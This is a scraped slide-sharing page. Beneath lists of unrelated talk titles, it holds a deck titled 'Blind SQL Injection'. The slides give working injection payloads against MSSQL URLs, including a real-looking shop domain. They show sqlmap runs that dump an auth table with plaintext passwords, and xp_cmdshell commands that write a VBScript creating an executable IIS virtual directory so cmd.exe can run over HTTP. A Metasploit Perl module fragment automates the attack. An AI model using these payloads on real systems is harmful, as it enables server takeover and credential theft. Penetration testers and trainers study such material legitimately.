New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 

Dernier (20)

Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 

Blind SQL Injection

  • 2. Blind SQL Injection • We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. • Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. • Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. • We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. • If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS.
  • 3. Checks… • AND 1=1 • DBO check http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo' • Wait delay call http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10' • (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 • http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114 • http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),2,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97
  • 4. Running tools • SQL Map or Absinthe D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:47:58 [18:48:00] [WARNING] the remote DMBS is not MySQL [18:48:00] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [*] shutting down at: 18:48:14
  • 5. Enumeration… D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:53:10 [18:53:12] [WARNING] the remote DMBS is not MySQL [18:53:12] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- available databases [9]: [*] CmdExec_example [*] Dashboard [*] catalog [*] demotrading [*] master [*] model [*] msdb [*] order [*] tempdb [*] shutting down at: 18:55:07
  • 6. Enumeration… D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -D catalog sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:59:21 [18:59:22] [WARNING] the remote DMBS is not MySQL [18:59:22] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server Database: catalog [3 tables] +--------------+ | auth | | dtproperties | | items | +--------------+
  • 7. Enumeration… D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D ca talog -T auth sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 19:01:27 [19:01:28] [WARNING] the remote DMBS is not MySQL [19:01:28] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server Database: catalog Table: auth [3 entries] +--------+------+---------+ | access | user | pass | +--------+------+---------+ | 101010 | dbo | john123 | | 110011 | | great | | 001011 | | loveit | +--------+------+---------+
  • 8. Exploiting Set WshShell = WScript.CreateObject("WScript.Shell") Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") windir = ObjExec.StdOut.ReadLine() Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") Set Dir = Root.Create("IIsWebVirtualDir", "secret") Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:secret.vbs’ ….. ….. ….. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo >> c:secret.vbs’ http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’
  • 9. Get the cmd.exe • Run command over HTTP/HTTPS • http://target/secret/system32/cmd.exe?+/c+set
  • 10. Metasploit … sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $path = $self->GetVar('RPATH'); my $vhost = $self->GetVar('VHOST'); my @url = split(/#/, $path); my @payload = ("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'", "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'" ); $self->PrintLine("[+] Sending SQL injection payload..."); for(my $count=0;$count<=6;$count++) ..